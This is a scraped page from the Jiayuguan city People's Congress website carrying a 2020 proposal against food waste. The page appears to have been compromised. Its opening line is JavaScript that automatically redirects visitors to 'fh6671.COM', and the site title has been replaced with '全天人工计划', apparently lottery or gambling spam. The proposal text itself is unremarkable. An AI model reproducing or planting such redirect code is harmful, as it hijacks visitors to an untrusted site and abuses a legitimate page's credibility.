function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  
嘉峪关市人大常委会关于“坚决制止餐饮浪费行为”倡议书 
来源: 市人大常委会      日期: 2020-09-21      作者:       点击数:

嘉峪关市人大常委会关于“坚决制止餐饮浪费行为”倡议书 

   为认真贯彻落实习近平总书记对坚决制止餐饮浪费行为作出的重要指示,弘扬中华民族勤俭节约的传统美德,维护文明城市的良好形象,市人大常委会现向全市各级人大代表、各级人大工作机构、各镇人大发出倡议:

       一、切实提高政治站位

       党的十八大以来,习近平总书记一直高度重视粮食安全和提倡“厉行节约、反对浪费”的社会风尚,多次强调要制止餐饮浪费,并对制止餐饮浪费行为作出了重要指示,表明了我们党厉行勤俭节约、反对铺张浪费的鲜明态度和坚定决心。全市各级人大代表、各级人大工作机构、各镇人大要深刻认识制止餐饮浪费行动的重大意义,增强粮食安全的危机意识,强化勤俭节约的行动自觉,率先做“文明用餐、拒绝浪费”的宣传者、倡导者、践行者。

       二、积极引领健康文明饮食的新风尚

       全市各级人大代表、各级人大工作机构、各镇人大要结合自身实际,立足行业、岗位和密切联系群众的优势,利用人大代表之家、人大代表工作站的载体和平台,充分发挥代表工作的优势,广泛深入开展宣传教育活动。贯彻落实市委“过紧日子”的要求,引导群众牢固树立“勤俭节约光荣,铺张浪费可耻”的意识,积极倡导健康文明用餐的新理念、新风尚、新习惯。

       三、大力弘扬中华传统美德

       全市各级人大代表、各级人大工作机构、各镇人大要积极践行社会主义核心价值观,自觉抵制享乐主义和奢靡之风,始终牢记“两个务必”,保持艰苦奋斗的良好作风,要带头弘扬中华民族厉行节约、勤俭持家的传统美德,树立良好的家风家教,教育督促家庭成员自觉养成艰苦朴素、文明简约的生活作风,坚决杜绝“舌尖上的浪费”,让“光盘”行动成为自觉。

       四、坚持用法治思维抵制浪费

       全市各级人大代表、各级人大工作机构、各镇人大要增强法治思维,用法治方式坚决制止铺张浪费,认真学习宪法和法律关于“厉行节约、反对浪费”的相关规定,坚持问题导向,以餐饮环节为切入点,要主动作为,身体力行做表率,深入开展调查研究,提出针对性、操作性强的意见建议,全力维护法律法规权威,坚决制止餐饮浪费行为。

 

 

                                                                                          嘉峪关市人大常委会

                                                                                          2020年9月21日